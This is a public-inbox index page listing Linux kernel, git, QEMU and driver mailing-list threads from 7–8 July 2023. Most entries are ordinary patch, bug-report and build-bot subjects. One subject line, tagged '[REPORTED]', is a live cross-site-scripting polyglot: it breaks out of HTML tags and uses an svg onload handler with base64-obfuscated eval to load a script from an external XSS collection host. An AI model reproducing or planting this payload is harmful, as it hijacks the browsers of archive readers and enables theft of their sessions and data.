messages from 2023-07-07 23:17:10 to 2023-07-08 01:52:56 UTC [more...]
[PATCH] net/mana: set the correct queue state
2023-07-08 1:52 UTC (5+ messages)
` [PATCH] net/netvsc: "
[PATCH] r8152: Suspend USB device before shutdown when WoL is enabled
2023-07-08 1:51 UTC (3+ messages)
[tip:x86/core] BUILD SUCCESS b1472a60a584694875a05cf8bcba8bdf0dc1cd3a
2023-07-08 1:50 UTC
[REPORTED] "--></title></style></textarea></noscript></select></script></noembed></template></frameset></iframe>'//><svg/onload=javascript:eval(atob('dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL21hcmswciI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs='))//"
2023-07-08 1:43 UTC
[PATCH v3 net] icmp6: Fix null-ptr-deref of ip6_null_entry->rt6i_idev in icmp6_dev()
2023-07-08 1:43 UTC
[PATCH] mm: hugetlb_vmemmap: fix a race between vmemmap pmd split
2023-07-08 1:42 UTC (5+ messages)
[PATCH v2 net] icmp6: Fix null-ptr-deref of ip6_null_entry->rt6i_idev in icmp6_dev()
2023-07-08 1:40 UTC (3+ messages)
[willy-pagecache:set_ptes 18/37] mm/userfaultfd.c:123:26: error: passing argument 1 of 'update_mmu_cache_range' from incompatible pointer type
2023-07-08 1:34 UTC
[PATCH v2 0/4] tracing/probes: Fix bugs in process_fetch_insn
2023-07-08 1:30 UTC (6+ messages)
` [PATCH v2 3/4] Revert "tracing: Add "(fault)" name injection to kernel probes"
[PATCH v5 0/6] Add support to print sub-block registers in dpu hw catalog
2023-07-08 1:24 UTC (14+ messages)
` [PATCH v5 1/6] drm/msm: Update dev core dump to not print backwards
` [PATCH v5 2/6] drm/msm/dpu: Drop unused num argument from relevant macros
` [PATCH v5 3/6] drm/msm/dpu: Define names for unnamed sblks
` [PATCH v5 4/6] drm/msm/dpu: Remove redundant prefix/suffix in name of sub-blocks
` [PATCH v5 5/6] drm/msm/dpu: Refactor printing of main blocks in device core dump
` [PATCH v5 6/6] drm/msm/dpu: Update dev core dump to dump registers of sub-blocks
[shenki:aspeed-xvuart-host-driver 3/3] drivers/soc/aspeed/aspeed-host-bmc-dev.c:196 aspeed_pci_host_bmc_device_probe() warn: possible memory leak of 'pci_bmc_dev'
2023-07-08 1:24 UTC
[android-common:android-4.19-stable 2/3] drivers/net/wireguard/allowedips.c:193:30: sparse: sparse: incorrect type in argument 1 (different address spaces)
2023-07-08 1:24 UTC
[PATCH v6] ppc: Enable 2nd DAWR support on p10
2023-07-08 1:24 UTC (6+ messages)
[PATCH] init: Don't proxy console= to earlycon
2023-07-08 1:17 UTC
[PATCH v2] ppc/pnv: Add QME region for P10
2023-07-08 1:16 UTC (2+ messages)
[RFC PATCH] xen/arm: Rebranding dom0less feature
2023-07-08 1:17 UTC (9+ messages)
[Patch v2] drm/ttm: Use init_on_free to delay release TTM BOs
2023-07-08 1:13 UTC
[PATCH v4 0/4] RISC-V: mm: Make SV48 the default address space
2023-07-08 1:11 UTC (10+ messages)
` [PATCH v4 1/4] RISC-V: mm: Restrict address space for sv39,sv48,sv57
` [PATCH v4 2/4] RISC-V: mm: Add tests for RISC-V mm
` [PATCH v4 3/4] RISC-V: mm: Update pgtable comment documentation
` [PATCH v4 4/4] RISC-V: mm: Document mmap changes
imx8mp mipi csi camera overlay: Unable to retrieve endpoint for port@1
2023-07-08 1:10 UTC (4+ messages)
[possible regression in 6.5-rc1] sendmsg()/splice() returns EBADMSG
2023-07-08 1:09 UTC (2+ messages)
[PATCH] cxl/acpi: Release device after dev_err
2023-07-08 1:07 UTC (4+ messages)
imx8mp: issues getting dtb with pcie enabled to boot
2023-07-08 1:06 UTC (4+ messages)
[PATCH 0/5] SubmittingPatches: clarify which branch to use
2023-07-08 1:05 UTC (6+ messages)
` [PATCH 1/5] SubmittingPatches: reword awkward phrasing
` [PATCH 2/5] SubmittingPatches: be more explicit
` [PATCH 3/5] SubmittingPatches: discuss subsystems separately from git.git
` [PATCH 4/5] SubmittingPatches: remove confusing guidance about base branches
` [PATCH 5/5] SubmittingPatches: define topic branches
[PATCH 00/17] drm/msm/mdp[45]: use managed memory allocations
2023-07-08 1:04 UTC (36+ messages)
` [PATCH 01/17] drm/msm: add arrays listing formats supported by MDP4/MDP5 hardware
` [PATCH 02/17] drm/msm/mdp5: use devres-managed allocation for configuration data
` [PATCH 03/17] drm/msm/mdp5: use devres-managed allocation for CTL manager data
` [PATCH 04/17] drm/msm/mdp5: use devres-managed allocation for mixer data
` [PATCH 05/17] drm/msm/mdp5: use devres-managed allocation for pipe data
` [PATCH 06/17] drm/msm/mdp5: use devres-managed allocation for SMP data
` [PATCH 07/17] drm/msm/mdp5: use devres-managed allocation for INTF data
` [PATCH 08/17] drm/msm/mdp5: use drmm-managed allocation for mdp5_crtc
` [PATCH 09/17] drm/msm/mdp5: use drmm-managed allocation for mdp5_encoder
` [PATCH 10/17] drm/msm/mdp5: use drmm-managed allocation for mdp5_plane
` [PATCH 11/17] drm/msm/mdp4: use bulk regulators API for LCDC encoder
` [PATCH 12/17] drm/msm/mdp4: use drmm-managed allocation for mdp4_crtc
` [PATCH 13/17] drm/msm/mdp4: use drmm-managed allocation for mdp4_dsi_encoder
` [PATCH 14/17] drm/msm/mdp4: use drmm-managed allocation for mdp4_dtv_encoder
` [PATCH 15/17] drm/msm/mdp4: use drmm-managed allocation for mdp4_lcdc_encoder
` [PATCH 16/17] drm/msm/mdp4: use drmm-managed allocation for mdp4_plane
` [PATCH 17/17] drm/msm: drop mdp_get_formats()
[PATCH v2 1/4] mgmt-tester: Fix tests that consider 31 bytes the max adv lenght
2023-07-08 1:04 UTC (2+ messages)
` [v2,1/4] "
[PATCH 0/4] Upstream debugger feature for GFX v9.4.3
2023-07-08 0:53 UTC (5+ messages)
` [PATCH 1/4] drm/amdkfd: add kfd2kgd debugger callbacks for GC v9.4.3
[zen:6.4/prjc 381/386] kernel/sched/alt_core.c:4284:14: sparse: sparse: incorrect type in assignment (different address spaces)
2023-07-08 0:52 UTC
[zen:6.4/prjc 378/386] kernel/sched/alt_core.c:135:1: sparse: sparse: symbol '__pcpu_scope_sched_cpu_llc_mask' was not declared. Should it be static?
2023-07-08 0:42 UTC
[PATCH v1 0/5] incorporate pm runtime framework and eDP clean up
2023-07-08 0:38 UTC (26+ messages)
` [PATCH v1 1/5] drm/msm/dp: remove pm_runtime_xxx() from dp_power.c
` [PATCH v1 2/5] drm/msm/dp: incorporate pm_runtime framework into DP driver
` [PATCH v1 3/5] drm/msm/dp: delete EV_HPD_INIT_SETUP
` [PATCH v1 4/5] drm/msm/dp: move relevant dp initialization code from bind() to probe()
` [PATCH v1 5/5] drm/msm/dp: move of_dp_aux_populate_bus() to probe for eDP
[Intel-gfx] [PATCH i-g-t] i915_pm_freq_api: Add some debug to tests
2023-07-08 0:34 UTC (4+ messages)
` [igt-dev] "
` [igt-dev] ✗ Fi.CI.BAT: failure for "
` [igt-dev] ○ CI.xeBAT: info "
[PATCH v7 00/19] mm: ioremap: Convert architectures to take GENERIC_IOREMAP way
2023-07-08 0:33 UTC (3+ messages)
` [PATCH v7 09/19] openrisc: mm: Convert to GENERIC_IOREMAP
[willy-pagecache:set_ptes 9/38] arch/arm/mm/fault-armv.c:201:2: error: must use 'struct' tag to refer to type 'folio'
2023-07-08 0:31 UTC
[PATCH 0/6] fsck: squelch progress output with `--no-progress`
2023-07-08 0:31 UTC (7+ messages)
` [PATCH 1/6] fsck: suppress commit-graph "
` [PATCH 2/6] fsck: suppress MIDX "
` [PATCH 3/6] commit-graph.c: extract `verify_one_commit_graph()`
` [PATCH 4/6] commit-graph.c: iteratively verify commit-graph chains
` [PATCH 5/6] commit-graph.c: pass progress to `verify_one_commit_graph()`
` [PATCH 6/6] commit-graph.c: avoid duplicated progress output during `verify`
Pending splice(file -> FIFO) always blocks read(FIFO), regardless of O_NONBLOCK on read side?
2023-07-08 0:30 UTC (14+ messages)
` Pending splice(file -> FIFO) excludes all other FIFO operations forever (was: ... always blocks read(FIFO), regardless of O_NONBLOCK on read side?)
[PATCH v2] kallsyms: strip LTO-only suffixes from promoted global functions
2023-07-08 0:23 UTC (3+ messages)
[PATCH bpf-next] libbpf: only reset sec_def handler when necessary
2023-07-08 0:15 UTC (2+ messages)
[PATCH v1 net] icmp6: Fix null-ptr-deref of fib6_null_entry->rt6i_idev in icmp6_dev()
2023-07-08 0:07 UTC (2+ messages)
[Nouveau] [PATCH] drm/nouveau/disp/g94: enable HDMI
2023-07-08 0:06 UTC (5+ messages)
` "
[PATCH v1 0/7] Add support for various features to i.MX6 bindings
2023-07-08 0:06 UTC (4+ messages)
` [PATCH v2 5/5] dt-bindings: input: touchscreen: edt-ft5x06: Add 'threshold' property
[PATCH] Input: adp5588-keys - Use devm_regulator_get_enable()
2023-07-08 0:04 UTC (2+ messages)
[PATCH] Input: pinephone-keyboard - Use devm_regulator_get_enable()
2023-07-08 0:04 UTC (2+ messages)
[PATCH v5 RFC 0/6] introduce page_pool_alloc() API
2023-07-08 0:01 UTC (4+ messages)
` [PATCH v5 RFC 1/6] page_pool: frag API support for 32-bit arch with 64-bit DMA
[PATCH v2 1/2] dt-bindings: Input: exc3000 - Support power supply regulators
2023-07-08 0:00 UTC (4+ messages)
` [PATCH v2 2/2] "
[PATCH 0/2] Input: xpad - Additional controller support
2023-07-08 0:00 UTC (5+ messages)
` [PATCH 1/2] Input: xpad - fix support for some third-party controllers
` [PATCH 2/2] Input: xpad - Add GameSir VID for Xbox One controllers
[PATCH] Input: xpad - add GameSir T4 Kaleid Controller support
2023-07-07 23:59 UTC (2+ messages)
[PATCH RESEND v3 bpf-next 00/14] BPF token
2023-07-07 23:58 UTC (12+ messages)
` [PATCH RESEND v3 bpf-next 01/14] bpf: introduce BPF token object
[PATCH v4 00/24] Input: Simplify with dev_err_probe()
2023-07-07 23:58 UTC (2+ messages)
[QEMU][PATCH v2 0/2] Add Virtio support to Xenpvh machine for arm
2023-07-07 23:56 UTC (5+ messages)
` [QEMU][PATCH v2 1/2] xen_arm: Create virtio-mmio devices during initialization
` [QEMU][PATCH v2 2/2] xen_arm: Initialize RAM and add hi/low memory regions
[PATCH v1 0/2] arm64: dts: imx8mp: Enable CSIS and ISI in DT
2023-07-07 23:55 UTC (8+ messages)
` [PATCH v1 1/2] arm64: dts: imx8mp: Add CSIS DT nodes
[PATCH 00/12] drm/msm/adreno: Move away from legacy revision matching
2023-07-07 23:54 UTC (8+ messages)
` [PATCH 09/12] drm/msm/adreno: Add adreno family
[PATCH 00/13] drm/msm/dpu: use managed memory allocations
2023-07-07 23:48 UTC (6+ messages)
` [PATCH 01/13] drm/msm/dpu: cleanup dpu_kms_hw_init error path
[PATCH 0/2] Fix attr magic combined with pathspec prefix
2023-07-07 23:45 UTC (3+ messages)
` [PATCH 2/2] dir: do not feed path suffix to pathspec match
` [PATCH 2/2alt] "
[PATCH u-boot 1/4] mmc: spl: Make partition choice in default_spl_mmc_emmc_boot_partition() more explicit
2023-07-07 23:43 UTC (3+ messages)
` [PATCH v3 u-boot] "
[Intel-gfx] [PATCH v1] drm/i915/pxp/mtl: Update gsc-heci cmd size and timeout
2023-07-07 23:43 UTC (2+ messages)
` [Intel-gfx] ✗ Fi.CI.IGT: failure for "
SFrame version 2 in upcoming Binutils 2.41
2023-07-07 23:43 UTC (2+ messages)
[PATCH v2 1/2] Bluetooth: MGMT: Fix always using HCI_MAX_AD_LENGTH
2023-07-07 23:37 UTC (2+ messages)
` [v2,1/2] "
[PATCH v1 00/17] btrfs: add encryption feature
2023-07-07 23:36 UTC (5+ messages)
` [PATCH v1 01/17] btrfs: disable various operations on encrypted inodes
` [PATCH v1 05/17] btrfs: add inode encryption contexts
[virtio-dev] [RFC PATCH 0/7] Add virtio_rtc module and related changes
2023-07-07 23:31 UTC (3+ messages)
` [RFC PATCH 3/7] timekeeping: Fix cross-timestamp interpolation for non-x86
[PATCH] Move rmnet out of NET_VENDOR_QUALCOMM dependency
2023-07-07 23:27 UTC (6+ messages)
[PATCH 1/2] dt-bindings: remoteproc: imx_rproc: Support i.MX8MN/P MMIO
2023-07-07 23:26 UTC (4+ messages)
` [PATCH 2/2] remoteproc: imx_rproc: Switch iMX8MN/MP from SMCCC to MMIO
[PATCH 1/2] dt-bindings: remoteproc: imx_rproc: Document fsl,startup-delay-ms
2023-07-07 23:24 UTC (4+ messages)
` [PATCH 2/2] remoteproc: imx_rproc: add start up delay
[BUG 6.4] sched/core: Possible buffer overflow in do_set_cpu_allowed
2023-07-07 23:24 UTC (2+ messages)
[linux-next:master 13243/13370] include/asm-generic/io.h:636:15: error: redefinition of 'inb_p'
2023-07-07 23:20 UTC
[android-common:android12-5.10-2022-10 21714/21865] drivers/dma-buf/dma-buf-sysfs-stats.c:142:2: error: static assertion failed due to requirement 'sizeof(struct kobject) >= sizeof(struct work_struct)': kobject is smaller than work_struct
2023-07-07 23:20 UTC
[PATCH net-next] gve: enhance driver name usage
2023-07-07 23:20 UTC (2+ messages)
[BUG] perf test: Regression because of d6e6286a12e7
2023-07-07 23:16 UTC (2+ messages)
page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.